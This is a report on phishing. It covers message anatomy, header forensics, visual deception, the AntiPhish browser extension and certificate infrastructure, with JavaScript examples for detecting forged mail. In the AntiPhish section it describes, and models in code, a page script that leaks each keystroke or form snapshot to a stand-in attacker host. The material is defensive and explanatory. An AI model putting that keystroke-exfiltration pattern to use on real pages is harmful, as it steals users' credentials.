12966857-Phishing

Apr 06, 2018

Shiv Csk
  • 8/3/2019 12966857-Phishing

    1/23

ABSTRACT

The losses caused by phishing attacks are rising sharply. Attacks on financial services companies have been doubling year over year. It is very important for companies to find new ways to counter phishing, because it can cause major losses to well-known companies and can make consumers lose confidence in doing business online, which affects every company with an online presence. No single technology can stop phishing attacks, but there are many ways to prevent phishers from accomplishing their goals. Consumer education can raise awareness of the phishing threat and of other online vulnerabilities. Lastly, biometrics should become a major part of the defence against phishing, because it adds further steps to user authentication.

INTRODUCTION

Phishing is the practice in which criminals send out unsolicited e-mails that masquerade as messages from legitimate organizations, using logos and other formatting to resemble authentic e-mails from the company they are impersonating.

Once users receive such an e-mail, the phishers attempt to lure them to web sites that ask for personal information such as credit card numbers and social security numbers, so that the attackers can take over the users' accounts. The so-called phishers try to steal usernames and passwords for identity theft and banking fraud.

Companies such as PayPal, eBay and Amazon, and most banks, have been the biggest targets of phishing attacks.

LITERATURE REVIEW

The term phishing was coined in January 1996 by hackers who were stealing accounts from unsuspecting AOL members.

Comparison to Spam

The purpose of a phishing message is to acquire sensitive information about a user. To do so, the message has to deceive the intended recipient into believing that it comes from a legitimate organization. As a form of deception, a phishing message contains no useful information for the recipient and thus falls under the category of spam. Phishing nevertheless differs from ordinary spam: among other things, spam tries to sell a product or service, while a phishing message needs to look as if it came from a legitimate organization.

Because phishing messages closely resemble legitimate ones, techniques developed for spam cannot be applied naively to phishing. For example, text-based classification performs reasonably well at identifying spam, but since a phishing message is forged to look like a message from a legitimate organization, a text classifier applied naively to phishing will have a high miss rate.

Anatomy of a phishing message

A raw phishing message can be split into two components, the content and the headers. These are commonly accepted as the major components of any e-mail message.

Content:

The content is the part of the message that the user sees; it is the part that the producers of phishing messages use to deceive users. It can be subdivided into two parts.

• The cover is the content that is made to look like a message from the legitimate organization, and usually informs the user of a problem with their account. Early phishing messages could be identified from their cover alone, because of imperfect grammar or spelling mistakes (which are uncommon in legitimate messages). Over time the covers have become more sophisticated, to the point where they even warn the user about protecting their password and avoiding fraud. An example can be seen in the figure (not reproduced in this transcript), where the phishing message tells the victim to "Protect Your Account Info" by making sure they never provide their password to fraudulent websites.

• The sting is the part of the content that directs the victim to take "remedial" action. It usually takes the form of a clickable URL that sends the victim to a fake website to log into their account or enter other personal details. We call it the sting because this is the part that inflicts the pain, through financial loss or other harm once the victim enters their details on the fake site. Typically the sting is hidden by using HTML to display a legitimate-looking address instead of the real address of the fake website. In the example in the figure, the link actually points to http://www.nutristore.com.au/r.htm while the displayed text is the legitimate-looking https://www2.paypal.com/cgi-bin/?cmd=login.

Headers

The headers are the part of the message used primarily by mail servers and the mail client to determine where the message is going and how to unpack it. Most users never see the headers, but for deciding whether a message is phishing they can be quite useful. Headers can be subdivided into three groups according to which entity adds them to the message:

• Mail clients typically add headers such as To:, From: and Subject:, plus some client-specific headers such as X-MSMail-Priority, X-Mailer and X-MimeOLE (visible in the example figure, not reproduced here). Phishing messages may try to fake a particular header and, in doing so, give away that the message is forged. For example, if the X-Mailer header claims that an HTML message was composed with Microsoft Outlook but the message contains only an HTML part (no plain-text alternative), that is a sign the message is fake, since Outlook does not send HTML-only messages: it sends a multipart/alternative message with a text/plain part. Note that the From: header is just as easy to forge, so on its own it proves nothing about the true sender.

• Mail relays add headers along the message's path, usually Received: headers, which can be used to determine the originating IP address of the message and the route it took. Each relay prepends its own Received: line, so the chain is read from the bottom up; only the lines added by relays you trust are reliable, because a phisher can insert forged Received: lines before handing the message off.

• Spam filters and virus scanners usually add headers recording the results of the tests run over the message. The receiving client can then use these headers (against a user-set threshold) to decide what to do with the message.
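The header and content checks just described can be automated. The following is an added example (it is not code from the original paper): it parses a constructed raw message, walks the Received: chain from the bottom up to find the originating IP, flags the X-Mailer/HTML-only inconsistency, and compares each anchor's displayed URL with the host its href really points to (the sting). The hosts, addresses and X-Mailer string in the sample message are made up.

```javascript
// Added example, not code from the paper: analyzing the headers and content
// of a raw phishing message. RAW_MESSAGE is constructed for this example;
// hosts, IPs and the X-Mailer string are made up.
const RAW_MESSAGE = [
  "Received: from mx2.example-bank.invalid (mx2.example-bank.invalid [192.0.2.10])",
  "\tby inbound.mailhost.invalid with ESMTP id abc123;",
  "\tMon, 3 Apr 2006 10:12:01 +0000",
  "Received: from unknown (HELO paypal.com) (198.51.100.77)",
  "\tby mx2.example-bank.invalid with SMTP; Mon, 3 Apr 2006 10:11:58 +0000",
  'From: "PayPal" <service@paypal.com>',
  "Subject: Protect Your Account Info",
  "X-Mailer: Microsoft Outlook Express 6.00.2900.2180",
  "Content-Type: text/html; charset=us-ascii",
  "",
  "<html><body>",
  "<p>Protect Your Account Info: never provide your password to fraudulent websites.</p>",
  '<p>Log in here: <a href="http://www.nutristore.com.au/r.htm">',
  "https://www2.paypal.com/cgi-bin/?cmd=login</a></p>",
  "</body></html>",
].join("\r\n");

// Split a raw message into [name, value] header pairs and the body.
// Continuation lines (leading whitespace) are unfolded onto the previous header.
function parseMessage(raw) {
  const lines = raw.split(/\r?\n/);
  const headers = [];
  let i = 0;
  for (; i < lines.length && lines[i] !== ""; i++) {
    const line = lines[i];
    if (/^[ \t]/.test(line) && headers.length > 0) {
      headers[headers.length - 1][1] += " " + line.trim();
      continue;
    }
    const colon = line.indexOf(":");
    if (colon > 0) headers.push([line.slice(0, colon).trim(), line.slice(colon + 1).trim()]);
  }
  return { headers, body: lines.slice(i + 1).join("\n") };
}

function getHeader(headers, name) {
  const wanted = name.toLowerCase();
  return headers.filter(([n]) => n.toLowerCase() === wanted).map(([, v]) => v);
}

// Each relay prepends its own Received: line, so the last one is the earliest
// hop. Only lines added by relays you trust are reliable: a phisher can place
// forged Received: lines below them before handing the message off.
function receivedChain(headers) {
  return getHeader(headers, "Received").map((v) => {
    const m = v.match(/\b(\d{1,3}(?:\.\d{1,3}){3})\b/);
    return m ? m[1] : null;
  });
}

function originatingIp(headers) {
  const chain = receivedChain(headers);
  return chain.length > 0 ? chain[chain.length - 1] : null;
}

// Outlook composes HTML mail as multipart/alternative with a text/plain part,
// so an X-Mailer claiming Outlook on a text/html-only message is inconsistent.
function htmlOnlyOutlook(headers) {
  const mailer = getHeader(headers, "X-Mailer").join(" ");
  const ctype = getHeader(headers, "Content-Type").join(" ").toLowerCase();
  return /outlook/i.test(mailer) && ctype.startsWith("text/html");
}

function hostOf(text) {
  try {
    return new URL(text.trim()).hostname;
  } catch (e) {
    return null; // displayed text is not a URL (e.g. "click here")
  }
}

// The sting: anchors whose displayed text is a URL on a different host than
// the one the href really points to.
function findStings(body) {
  const stings = [];
  const re = /<a\b[^>]*href\s*=\s*["']([^"']+)["'][^>]*>([\s\S]*?)<\/a>/gi;
  let m;
  while ((m = re.exec(body)) !== null) {
    const text = m[2].replace(/<[^>]+>/g, "").trim();
    const hrefHost = hostOf(m[1]);
    const textHost = hostOf(text);
    stings.push({ href: m[1], text, hrefHost, textHost,
                  mismatch: textHost !== null && hrefHost !== textHost });
  }
  return stings;
}

function analyze(raw) {
  const { headers, body } = parseMessage(raw);
  return {
    originatingIp: originatingIp(headers),
    htmlOnlyOutlook: htmlOnlyOutlook(headers),
    stings: findStings(body),
  };
}

console.log(JSON.stringify(analyze(RAW_MESSAGE), null, 2));
```

Run it with node; it prints the originating IP (198.51.100.77, the host that claimed to be paypal.com in its HELO), the Outlook/HTML-only inconsistency, and the one anchor whose displayed host (www2.paypal.com) differs from its real target (www.nutristore.com.au). In a production filter you would stop walking the Received: chain as soon as you leave the relays you control.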

WHY PHISHING ATTACKS WORK

Lack of Knowledge

• Lack of computer system knowledge: Many users lack an understanding of how operating systems, applications, e-mail and the web work, and of how to tell them apart. Phishing sites exploit this in several ways. For example, some users do not understand the meaning or the syntax of domain names and cannot distinguish legitimate from fraudulent URLs (they may think that www.ebay-members-security.com belongs to www.ebay.com, although the registered domain is ebay-members-security.com, which has nothing to do with ebay.com). Another attack strategy forges the e-mail headers; many users lack the skills to distinguish forged headers from legitimate ones.

• Lack of knowledge of security and security indicators: Many users do not understand security indicators. For example, many do not know that a closed padlock icon in the browser indicates that the page was delivered over SSL/TLS. Even users who understand the icon can be fooled by a padlock placed within the body of a web page (a confusion not helped by the fact that competing browsers use different icons and place them in different parts of the display). More generally, users may not be aware that padlock icons appear in the browser chrome (the interface the browser constructs around a page: toolbars, windows, address bar, status bar) only under specific conditions, namely when SSL/TLS is used, whereas icons in the content of a web page can be placed there arbitrarily by designers (or by phishers) to induce trust. Attackers also exploit users' lack of understanding of how SSL certificates are verified. Most users do not know how to check a certificate in the browser or how to interpret the information in it. In one spoofing strategy, a rogue site displays a certificate authority's (CA) trust seal that links to a page on the CA's site. That page gives a plain-English description and verification of the legitimate site's certificate. Only the most informed and diligent users would know to check that the URL of the site they came from matches the site described by the CA.

• Lack of knowledge of web fraud: Some users do not know that spoofing a website is possible at all. Without an awareness that phishing exists, some users simply never question a website's legitimacy.

• Erroneous security knowledge: Some users have misconceptions about which website features indicate security. For example, study participants assumed that websites containing professional-looking images, animations and advertisements were legitimate (influenced by well-known trust indicators, discussed below). Similarly, dedicated login pages from banks were trusted less than logins reached from a homepage; several participants cited the lack of images and links as the reason for their distrust.

Visual Deception

Phishers use visual tricks to mimic legitimate text, images and windows.

• Visually deceptive text: Users may be fooled by the syntax of a domain name in typejacking attacks, which substitute letters that may go unnoticed (e.g. www.paypai.com uses a lowercase i, which looks similar to the letter l, and www.paypa1.com substitutes the digit 1 for the letter l). Phishers have also taken advantage of non-printing characters and non-ASCII Unicode characters in domain names (for example a Cyrillic а in place of the Latin a, which most fonts render identically).

• Images masking underlying text: One common technique is to use an image of a legitimate-looking hyperlink. The image itself is a hyperlink to a different, rogue site.

• Images mimicking windows: Phishers use images in the content of a web page that mimic browser windows or dialog windows. Because the image looks exactly like a real window, a user can be fooled unless they try to move or resize the "window" and discover that it is only an image.

• Windows masking underlying windows: A common technique is to place an illegitimate browser window on top of, or next to, a legitimate one. If both have the same look and feel, users may believe that both windows come from the same source, regardless of differences in address or security indicators. In the worst case a user may not even notice that a second window exists (browsers that allow borderless pop-up windows aggravate the problem).

• Deceptive look and feel: If images and logos are copied perfectly, sometimes the only cues available to the user are the tone of the language, misspellings or other signs of unprofessional design. If the phishing site closely mimics the target site, the only cue might be the type and quantity of personal information requested.

A related problem: for user convenience, some legitimate organizations let users log in from non-SSL pages. Although the form data may be transmitted securely, the browser gives no visual cue as to whether SSL is used for the form submission. To compensate, designers resort to placing a padlock icon in the page content, a tactic that phishers exploit too.

WHAT SHOULD BE DONE TO FIGHT PHISHING? (ANTI-PHISHING)

Phishing has to be managed across the network and all of its components: servers, PCs, operating systems, browsers and the other applications that use the connection.

Considering the danger of both false negatives, where a filter fails to identify a phishing site, and false positives, where a filter wrongly blocks a valid site, it is important to minimize both kinds of error.

Microsoft's anti-phishing response team analyzes reported sites carefully to confirm that they are fraudulent before adding them to the blocklist. Even then, sites that have been listed can be reconsidered and later removed from the list.

Another approach is technical: a biometric check. Biometrics refers to technologies that analyze an individual's physical or behavioral characteristics to automate identification or verification of the user. A biometric only helps against phishing if the check is performed by the legitimate site's own system; a biometric sample captured by a fake site is just another stolen credential.

To avoid being hooked by phishers, here are a few tips:

• Be extremely suspicious of any e-mail with an urgent request for personal information.

• Do not fill out forms embedded in e-mail messages, especially ones that appear to come from banks.

• Do not follow links provided in e-mails; they can lead to malware being installed on your computer. Instead, contact the company by phone, or type its address into the browser yourself, to resolve any problem.

• Do not give out credit card numbers or account information unless you are using a secure web site or the telephone. If you are using a web site, check the beginning of the address in the browser's address bar: a secure site shows https:// rather than just http://. Note that https:// only means the connection is encrypted to whoever holds the site's certificate; phishing sites can and do obtain certificates, so the domain name itself still has to be checked.

• Verify the real address of a web site. Paste the following into the browser's address bar:

javascript:alert("The actual URL of this site has been verified as: " + location.protocol + "//" + location.hostname + "/");

(location.protocol already includes the colon, so the alert shows, for example, https://www.paypal.com/. Modern browsers strip the javascript: prefix when it is pasted into the address bar, precisely to stop self-inflicted script injection, so the prefix may have to be retyped; simply reading the address bar is the more reliable check.)

• Ensure that your browser and operating system are up to date and that the latest security patches are applied.

Possible ways of bypassing AntiPhish with JavaScript

As long as the web page the user is viewing is pure HTML, AntiPhish can mitigate phishing attacks easily, because the attacker can only obtain the sensitive information after the user submits the form. Before that happens, AntiPhish detects that sensitive information has been typed into a form and cancels the operation. Stopping a phishing attack in an HTML page that contains JavaScript, on the other hand, is not that easy, and special care has to be taken. JavaScript is a powerful language that is widely used in web pages to submit forms, open windows, intercept events and validate input. At the same time it gives the attacker a wide range of possibilities for bypassing a monitoring application such as AntiPhish. Just as AntiPhish installs hooks to intercept user-generated events such as keystrokes, the attacker can install such hooks using JavaScript embedded in the page. Instead of waiting for the user to press a submit button, the attacker can intercept each key press and send the information character by character to a server of her choice. Typically this is done by changing the URL of an existing or hidden image to a site the attacker controls (e.g. when "a" is pressed, an image URL is set to http://attacker.com/key?a); the browser fetches the "image", and the key press arrives in the attacker's web server log. Another option is to set a simple timer and take periodic snapshots of the form contents. Either way, an important part of the information can be captured without the user ever pressing a submit button.

The easiest solution to the JavaScript problem is to deactivate JavaScript on any page that contains forms. Unfortunately this is not feasible, because, as mentioned before, a large number of web sites use JavaScript for validation and submission. The solution used in AntiPhish is to deactivate JavaScript whenever the focus is on an HTML text element and to reactivate it whenever the focus is lost. This ensures that the attacker cannot install hooks or timers, or intercept browser events such as key presses, while the user is typing into a text field, while the page's legitimate JavaScript functionality (such as input validation routines) is preserved. By the time the text element loses focus and JavaScript is reactivated, AntiPhish has already determined whether the information typed into the element is sensitive; if the web site is untrusted, the operation can be cancelled. One side effect of this approach is that legitimate event-based JavaScript, such as input validation on key presses, will not work. The use of key-press events for input validation is, however, uncommon; most web sites perform client-side validation once, just before a form is submitted.
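To make the bypass and the mitigation concrete, here is an added model (not the AntiPhish prototype's own code) of the interaction described above, written so that it runs without a browser: the text field is a small event dispatcher standing in for the DOM, the attacker's image request is appended to a list instead of being sent to http://attacker.com, and AntiPhish's rule of disabling page JavaScript while a text field has focus is modelled as a gate on page-registered listeners. The stored credential, the trusted domain and the phishing domain are made up.

```javascript
// Added example, not the AntiPhish prototype's code: a browser-free model of
// the JavaScript bypass and the focus-based mitigation described above.
// Credential, trusted domain and phishing domain are made up.

// Stand-in for an <input type="text"> plus the browser's event dispatch.
class TextField {
  constructor() {
    this.value = "";
    this.focused = false;
    this.listeners = [];                  // { type, fn, origin }
    this.pageScriptEnabled = () => true;  // the extension can override this
  }
  addEventListener(type, fn, origin = "page") {
    this.listeners.push({ type, fn, origin });
  }
  dispatch(type, event) {
    for (const l of this.listeners) {
      if (l.type !== type) continue;
      if (l.origin === "page" && !this.pageScriptEnabled()) continue; // JS "off"
      l.fn(event);
    }
  }
  focus() { this.focused = true; this.dispatch("focus", {}); }
  keypress(key) { this.dispatch("keypress", { key }); this.value += key; }
  timerTick() { this.dispatch("timer", {}); }   // a setInterval callback firing
  blur() { this.focused = false; this.dispatch("blur", {}); }
}

// Attacker's page script: the two bypasses from the text. Where a real page
// would set new Image().src = url, the URL is pushed into `sink` instead.
function installExfiltration(field) {
  const sink = [];
  field.addEventListener("keypress", (e) =>
    sink.push("http://attacker.invalid/key?" + encodeURIComponent(e.key)));
  field.addEventListener("timer", () =>
    sink.push("http://attacker.invalid/snap?" + encodeURIComponent(field.value)));
  return sink;
}

// Extension-side model of AntiPhish: page script is disabled while a text
// field has focus; on blur the typed value is compared with the stored
// credentials and the operation is cancelled if the site is not the trusted one.
class AntiPhish {
  constructor(credentials) {   // Map: secret -> domain it was registered for
    this.credentials = credentials;
    this.blocked = false;
  }
  protect(field, siteDomain) {
    field.pageScriptEnabled = () => !field.focused;
    field.addEventListener("blur", () => {
      const trustedDomain = this.credentials.get(field.value);
      if (trustedDomain !== undefined && trustedDomain !== siteDomain) {
        this.blocked = true;
        field.value = "";   // cancel: the form never sees the credential
      }
    }, "extension");
  }
}

// The user types a password saved for paypal.com into a field on the
// phishing site, while the attacker's key hook and snapshot timer run.
function simulate(withAntiPhish) {
  const field = new TextField();
  const sink = installExfiltration(field);
  const antiPhish = new AntiPhish(new Map([["hunter2", "paypal.com"]]));
  if (withAntiPhish) antiPhish.protect(field, "nutristore.com.au");
  field.focus();
  for (const k of "hunter2") field.keypress(k);
  field.timerTick();   // snapshot while the field still has focus
  field.blur();
  field.timerTick();   // snapshot after focus is lost and page JS is back on
  return { exfiltrated: sink, blocked: antiPhish.blocked, value: field.value };
}

console.log("unprotected:", simulate(false));
console.log("with AntiPhish:", simulate(true));
```

Without the extension every keystroke and both snapshots reach the attacker's sink; with it, nothing leaks while the field has focus, and by the time the timer runs again after blur the field has already been cleared, which is exactly the ordering the text relies on. The model deliberately leaves out things a real page can do (script that runs before the field is focused, exfiltration through CSS or an automatic form submission), so it illustrates the mechanism rather than proving the defence complete.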

Implementation details

The AntiPhish prototype was implemented as a Mozilla browser extension (i.e., a plug-in). Mozilla extensions are written in the Mozilla XML User Interface Language (XUL) and JavaScript. The Mozilla implementation of AntiPhish has a small footprint: about 900 lines of JavaScript and 200 lines of XUL user-interface code. Paul Tero's JavaScript DES implementation was used to store the sensitive information in encrypted form. (DES, with its 56-bit key, is no longer an adequate cipher for protecting stored credentials; a current implementation would use AES.)

ANALYSIS OF A PHISHING DATABASE

The Anti-Phishing Working Group maintains a Phishing Archive describing phishing attacks dating back to September 2003. A cognitive walkthrough was performed on the approximately 200 sample attacks in this archive. (A cognitive walkthrough evaluates the steps required to perform a task and attempts to uncover mismatches between how users think about the task and how the user-interface designer thinks about it.) The goal was to gather information about which strategies attackers use and to formulate hypotheses about how lay users would respond to them. The strategies are organized along three dimensions: lack of knowledge, visual deception and lack of attention; the first two are discussed in the section above on why phishing attacks succeed. To aid readers who are unfamiliar with the topic, the security terms used are defined below.

Security Terms and Definitions

Certificate (digital certificate, public key certificate): Uses a digital signature to bind a public key to an identity. If the browser encounters a certificate that has not been signed by a trusted certificate authority, it warns the user. Some organizations create and sign their own self-signed certificates; if a browser encounters one, it issues a warning and lets the user decide whether to accept it.

Certificate Authority (CA): An entity that issues certificates and attests that a public key belongs to a particular identity. A list of trusted CAs is stored in the browser. A CA that does not verify applicants rigorously may issue a certificate to a fraudulent website.

HTTPS: Web browsers use "https" rather than "http" as the URL scheme to indicate that HTTP is sent over SSL/TLS.

Secure Sockets Layer (SSL) and Transport Layer Security (TLS): Cryptographic protocols that provide authentication and secure communication over the Internet. SSL/TLS authenticates a server by verifying that it holds a certificate digitally signed by a trusted certificate authority (and, during the handshake, that it possesses the matching private key). SSL/TLS also lets the client and server agree on the cryptographic algorithms used to protect the session. SSL is the older protocol family and is now deprecated; TLS is its successor.

Cryptography

Cryptography is a method of storing and transmitting data in a form that only its intended recipients can read and process: the science of protecting information by encoding it into an unreadable format. Cryptography is an effective way of protecting sensitive information both while it is stored on media and while it travels over network communication paths.

Although the ultimate goal of cryptography and its mechanisms is to hide information from unauthorized individuals, most algorithms can be broken, and the information revealed, if the attacker has enough time, motivation and resources. A more realistic goal of cryptography is therefore to make obtaining the information too work-intensive to be worth the attacker's effort.

Digital Certificates

Digital certificates are part of a technology called Public Key Infrastructure (PKI). They have been described as virtual ID cards, and the analogy is a useful one. In many ways digital certificates and ID cards really are the same: both an ID card and a client certificate contain information about the user, such as the user's name, and information about the organization that issued the card or certificate.

To create a digital certificate, a unique cryptographic key pair is generated. One key is the public key and the other the private key. The certification authority (in the higher-education setting described here, generally one run on campus) creates the certificate by combining information about the user and the issuing organization with the public key and digitally signing the whole thing. This is much like an organization's ID office filling out an ID card for the user and then signing it to make it official.

The enrolment process defines how a certificate authority establishes that a person or institution is who they claim to be. Certification may require recipients to appear in person and present photographs, birth certificates or social security numbers. Certificates issued after rigorous authentication are more trustworthy than certificates issued with little or no authentication.

The contents of a digital certificate are prescribed by the X.509 standard, defined by the ITU-T (also published as ISO/IEC 9594-8) and profiled for Internet use by the IETF. The current version is X.509 v3. The principal elements of a digital certificate are:

• Version number of the certificate format
• Serial number of the certificate
• Signature algorithm identifier
• Issuer of the certificate (a certificate authority)
• Validity period
• Unique identification of the certificate holder (the subject)
• Public key information
• The issuer's signature over all of the above

The Parties to a Digital Certificate

In principle there are three different interests associated with a digital certificate:

The Requesting Party: the party who needs the certificate and will offer it for use by others; they generally provide some or all of the information it contains.

The Issuing Party: the party that digitally signs the certificate after creating the information in it or checking its correctness.

The Verifying Party (or Parties): parties that validate the signature on the certificate and then rely on its contents for some purpose.

Type of certificate | Requesting party | Issuing party | Verifying party
Identity | The person concerned | The appropriate government agency | Anyone undertaking an identity check
Accreditation | A qualified member of a profession | The professional body | A user of the services offered by the member
Authorization | A customer wishing to access a resource | The resource owner | The resource owner

Public Key Certificates

The combination of standards, protocols and software that supports digital certificates is called a public key infrastructure, or PKI. The software that supports this infrastructure generates public/private key pairs: two keys related to one another through a mathematical algorithm, such that what is signed with the private key can be verified with the public key. Key pairs can reside on a computer or on hardware devices such as smart cards or removable media. Individuals and organizations must ensure the security of their private keys; the corresponding public keys, however, can be posted on web sites or sent across the network. Issuers of digital certificates often maintain online repositories of public keys, which make it possible to authenticate the owners of digital certificates in real time.

For example, publishers, as service providers, may want to authenticate the digital certificate of a faculty member or student in real time. This is done by verifying the digital signature using the public key held in the repository.

Certificate Authorities

Digital certificates are one component of a public key infrastructure (PKI). A PKI includes organizations called certification authorities (CAs) that issue, manage and revoke digital certificates; relying parties that use the certificates as evidence of authentication; and clients that request, manage and use certificates. A CA might set up a separate registration authority (RA) to handle the task of identifying the individuals who apply for certificates. Examples of certification authorities include VeriSign, a well-known commercial provider, and the CREN Certificate Authority, available to higher-education institutions.

Types of Certificates

There are different types of certificates, each with a different function, which can be confusing. It helps to distinguish at least four types. Samples of some of them can be inspected in a browser's certificate store.

Root or authority certificates: These form the base (or root) of a certification authority hierarchy, such as Thawte or CREN. They are not signed by another CA; they are self-signed by the CA that created them. In a self-signed certificate the name in the Issuer field is the same as the name in the Subject field.

Institutional authority certificates: Also called campus certificates. They are signed by a third party that vouches for the authenticity of a campus certification authority. Campuses then use their authority to issue client certificates for faculty, staff and students. (In X.509 terms these are intermediate CA certificates.)

Client certificates: Also known as end-entity, identity or personal certificates. The issuer is typically the campus CA.

Web server certificates: Used to secure communications to and from web servers, for example when you buy something on the web; also called server-side certificates. The Subject name in a server certificate is the DNS name of the server (in current practice the name is carried in the Subject Alternative Name extension, which browsers check instead of the Subject field).

The CREN Digital Certificate Services

CREN offers an expanded set of certificate-authority services to higher-education institutions:

CREN-signed campus certificates for institutions: For institutions issuing certificates to their campus community in the range of 10 or more web server certificates and more than 500-1000 client certificates.

CREN web server certificates: For campuses to use in securing web servers, supporting a range of campus web applications.

Client certificates: CREN has an internal CREN.NET service equivalent to a campus certificate-issuing application. A registration contact at the campus validates and approves individuals, and CREN issues the certificates.

With these three levels of service, including free test certificates, CREN can help campuses get started using digital certificates at a level matching their particular needs.

RECOMMENDATION

It is very important to reduce the risk of phishing in today's business, because attackers must be kept out of companies' customer accounts and databases. Education alone is not enough, since phishers get better every day and keep finding new ways to catch unsuspecting customers.

The real problem behind phishing is that login systems are weak: a password that can be typed into any web page can also be typed into a phisher's page, so user authentication needs to be tightened. Companies could strengthen their cryptographic protection by using more IPsec VPNs and digital certificates; with IPsec VPNs, customers, like the merchant, would need to obtain digital certificates from a certificate authority. During this research we also came across an article from PayPal in which the company is persuading e-mail providers to block messages that lack digital signatures (that is, messages claiming to come from PayPal that do not carry a valid e-mail authentication signature such as DomainKeys/DKIM).

The reason is that PayPal is one of the most heavily spoofed brands used by fraudsters today. This is a very good idea and a good way to keep spoofed PayPal mail out of customers' inboxes. Not only PayPal but every company that conducts business online should adopt a similar strategy. Strategies like this help customers gain confidence in doing business and dealing with money online. In addition, well-known companies should increase user awareness through education and training, and work with the FBI to track down phishers.

CONCLUSION

In short, the losses caused by phishing attacks are rising sharply, and attacks on financial services companies have been doubling year over year. It is of crucial importance for companies to find new ways to counter phishing, because it can cause major losses to well-known companies and can make consumers lose confidence in doing business online, which affects every company with an online presence. No single technology can stop phishing attacks, but there are many ways to prevent phishers from accomplishing their goals.

Consumer education can raise awareness of the phishing threat and of other online vulnerabilities. Lastly, biometrics should become a major part of the defence against phishing, because it adds further steps to user authentication.

REFERENCES

[1] Cannon, J. C. Privacy. Pearson Education, 2005.

[2] Hilley, Sarah. Internet war: picking on the finance sector (survey). Computer Fraud & Security, October 2006.

[3] Bellovin, Steven. Spamming, Phishing, Authentication, and Privacy. Inside Risks, Communications of the ACM, December 2004, Vol. 47, No. 12, p. 144.

[4] Mulrean, Jennifer. Phishing scams: How to avoid getting hooked. DollarWise.

[5] Hunter, Philip. Microsoft declares war on phishers. Computer Fraud & Security, May 2006, pp. 15-16.

[6] Google. http://www.google.com

[7] Anti-Phishing Working Group. Phishing Activity Trends Report, November 2005.

[8] Anti-Phishing Working Group. Phishing Archive. http://anti-phishing.org/phishing_archive.htm

[9] Ba, S. & Pavlou, P. Evidence of the Effect of Trust Building Technology in Electronic Markets: Price Premiums and Buyer Behavior.